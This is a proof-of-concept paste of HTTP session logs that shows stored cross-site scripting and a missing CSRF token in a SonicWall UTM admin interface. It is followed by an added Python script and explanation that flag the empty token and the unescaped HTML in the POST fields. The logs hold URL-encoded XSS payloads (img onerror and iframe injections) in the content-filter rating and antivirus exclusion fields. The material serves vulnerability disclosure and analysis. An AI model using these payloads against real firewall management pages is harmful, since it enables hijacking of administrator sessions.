9r3nXPaRTa

PoC Session Logs (POST) [Inject] and CSRF SonicWall

Jan 15th, 2018
Session Logs (Standard Request)

Status: pending[]
POST https://utm_waf.sonicwall.localhost:8351/main.cgi
Mime Type[unknown]
Request Header:
Host[utm_waf.sonicwall.localhost:8351]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://utm_waf.sonicwall.localhost:8351/addCfsLocalRating_-1.html]
Cookie[curUrl=securityServicesCFView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0]
POST data:
csrfToken[]
cfsRatingObjectName[test23]
cfsRatingCategory[2]
selectedItem[test.com]
itemList[test.com]
cfsRatingDomainList[test.com]
refresh_page[securityServicesCFView.html]
tableIndex[-1]
cgiaction[%5Bobject+Window%5D]

— PoC Session Logs (POST) [Inject] #1 —
Status: pending[]
POST https://utm_waf.sonicwall.localhost:8351/main.cgi
Mime Type[unknown]
Request Header:
Host[utm_waf.sonicwall.localhost:8351]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://utm_waf.sonicwall.localhost:8351/addCfsLocalRating_-1.html]
Cookie[curUrl=systemStatusView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0]
POST data:
csrfToken[]
cfsRatingObjectName[+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3EMALIICOUS INJECTED PAYLOAD!]
cfsRatingCategory[9]
selectedItem[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
itemList[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
cfsRatingDomainList[testdomain.com++%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dprompt%2823%29%3B%26gt%3B+++%22%26gt%3B%26lt%3B%22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B]
refresh_page[securityServicesCFView.html]
tableIndex[-1]
cgiaction[%5Bobject+Window%5D]

— PoC Session Logs (POST) [Inject] #2 —
Status: pending[]
POST https://utm_waf.sonicwall.localhost:8351/main.cgi
Mime Type[unknown]
Request Header:
Host[utm_waf.sonicwall.localhost:8351]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html]
Cookie[curUrl=gavSummary.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0; 2039=local; 2040=%7B%22refreshTime%22%3A3%2C%22showTimeRange%22%3A10%2C%22refreshEnable%22%3Atrue%2C%22viewApplications%22%3A1%2C%22viewBandwidth%22%3A1%2C%22viewPktRate%22%3A1%2C%22viewPktSize%22%3A1%2C%22viewConnRate%22%3A1%2C%22viewConnCount%22%3A1%2C%22viewCoreMonitor%22%3A1%2C%22displayBandwidth%22%3A%22bwSelRate%22%2C%22displayPktRate%22%3A%22pktRateSelRate%22%2C%22displayPktSize%22%3A%22pktSizeSelRate%22%2C%22displayConnRate%22%3A%22connRateSelRate%22%2C%22displayConnCount%22%3A%22connCountSelCount%22%2C%22ipVerBandwidth%22%3A%222%22%2C%22ipVerApps%22%3A%222%22%2C%22showMostFrequentApps%22%3Afalse%2C%22inChartAppLegends%22%3Afalse%2C%22hideAppLegends%22%3Atrue%2C%22inChartBwLegends%22%3Afalse%2C%22hideBwLegends%22%3Atrue%2C%22hidePktRateLegends%22%3Atrue%2C%22hidePktSizeLegends%22%3Atrue%2C%22hideConnRateLegends%22%3Atrue%2C%22hideConnCountLegends%22%3Atrue%2C%22hideAppChart%22%3Afalse%2C%22hideBwChart%22%3Afalse%2C%22hidePktRateChart%22%3Afalse%2C%22hidePktSizeChart%22%3Afalse%2C%22hideConnRateChart%22%3Afalse%2C%22hideConnCountChart%22%3Afalse%2C%22hideCoreMonChart%22%3Afalse%2C%22hideMemoryMonChart%22%3Afalse%2C%22rtAppColors%22%3A%5B%22%23081D58%22%2C%22%23253494%22%2C%22%23225EA8%22%2C%22%231D91C0%22%2C%22%2341B6C4%22%2C%22%237FCDBB%22%2C%22%23C7E9B4%22%2C%22%23EDF8B1%22%2C%22%23FFFFD9%22%5D%2C%22rtDataColors%22%3A%5B%22%23E41A1C%22%2C%22%23377EB8%22%2C%22%234DAF4A%22%2C%22%23984EA3%22%2C%22%23FF7F00%22%2C%22%23FFFF33%22%2C%22%23A65628%22%2C%22%23F781BF%22%2C%22%23999999%22%2C%22%235A6B34%22%2C%22%23F0D64E%22%2C%22%23D7B740%22%2C%22%23AB8024%22%2C%22%23925818%22%2C%22%23DB5A6E%22%2C%22%23071D69%22%2C%22%230A1650%22%2C%22%234571DA%22%2C%22%23E18B5C%22%2C%22%23028482%22%2C%22%237ABA7A%22%2C%22%23B76EB8%22%5D%2C%22useGradient%22%3Atrue%7D]

POST data:
csrfToken[???]
inputbox[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
gav_cloud_exclude_list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
gav_cloud_refresh_exclusions[]
refresh_page[gav_cloud.html]
isobject[1]
cgiaction[%5Bobject+Window%5D]
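The two points a reviewer pulls out of these logs are the empty `csrfToken[]` field and the form-encoded HTML in the rating and exclusion-list fields. As an added example (not part of the paste, and not SonicWall's or the paste author's code), here is a small Python script that parses this session-log format, form-decodes the POST parameters and flags exactly those two things. The embedded excerpt is constructed from the parameter names and encoded values of the "[Inject] #1" request above with the header lines trimmed; the function names are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed excerpt: parameter names and encoded values copied from the
# "[Inject] #1" request in the log, headers trimmed. Not a capture.
SAMPLE_LOG = """Status: pending[]
POST https://utm_waf.sonicwall.localhost:8351/main.cgi
Request Header:
Host[utm_waf.sonicwall.localhost:8351]
Referer[https://utm_waf.sonicwall.localhost:8351/addCfsLocalRating_-1.html]
POST data:
csrfToken[]
cfsRatingObjectName[+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E]
cfsRatingCategory[9]
selectedItem[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E]
cfsRatingDomainList[testdomain.com++%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dprompt%2823%29%3B%26gt%3B]
refresh_page[securityServicesCFView.html]
tableIndex[-1]
cgiaction[%5Bobject+Window%5D]
"""

# One "name[value]" line of the log; the value is still form-encoded.
PARAM_RE = re.compile(r"^(\w+)\[(.*)\]$")
# Characters or attributes that break out of an HTML text node or attribute value.
HTML_META = re.compile(r'[<>"]|\bon\w+=', re.IGNORECASE)
# Entity-encoded brackets/quotes: evidence that a client-side escape ran on this copy.
ENTITY = re.compile(r"&(?:lt|gt|quot|#\d+);")


def parse_post_params(log_text):
    """Return {name: decoded value} for the lines after 'POST data:' (or 'POST-Daten:')."""
    params = {}
    in_post = False
    for raw in log_text.splitlines():
        line = raw.strip()
        if line in ("POST data:", "POST-Daten:"):
            in_post = True
            continue
        if not in_post:
            continue
        m = PARAM_RE.match(line)
        if m:
            params[m.group(1)] = unquote_plus(m.group(2))
    return params


def analyze(params):
    """Map parameter name -> sorted list of findings worth a second look."""
    findings = {}
    if "csrfToken" not in params:
        findings["csrfToken"] = ["missing"]
    elif params["csrfToken"] == "":
        findings["csrfToken"] = ["empty"]
    for name, value in params.items():
        if name == "csrfToken":
            continue
        tags = []
        if ENTITY.search(value):
            tags.append("entity-encoded")
        # Strip the entities first so only what the escaping did NOT cover is flagged.
        if HTML_META.search(ENTITY.sub("", value)):
            tags.append("raw-html-metachars")
        if tags:
            findings[name] = sorted(tags)
    return findings


def run_sample():
    """Parse and analyze the constructed excerpt; returns (params, findings)."""
    params = parse_post_params(SAMPLE_LOG)
    return params, analyze(params)


if __name__ == "__main__":
    params, findings = run_sample()
    for name, tags in findings.items():
        print(f"{name}: {', '.join(tags)}  <- {params.get(name, '')!r}")
```

Run against the excerpt, the script reports `csrfToken` as empty and `cfsRatingObjectName` and `selectedItem` as carrying raw `"`, `<`, `>` and an `onerror=` attribute. It reports `cfsRatingDomainList` as both entity-encoded and still containing raw metacharacters, which is what the log itself shows: that copy arrives with `%26gt%3B`/`%26lt%3B` (`&gt;`/`&lt;`) where `selectedItem` and `itemList` carry `%3E`/`%3C`, so three copies of one value reach `main.cgi` with different encodings and the entity-encoded copy still has its double quotes and event handler unescaped. One caveat: every request in the log is recorded as `Status: pending[]` with no response body, so the log documents what the browser sent, not whether `main.cgi` accepted the empty token or stored the payload.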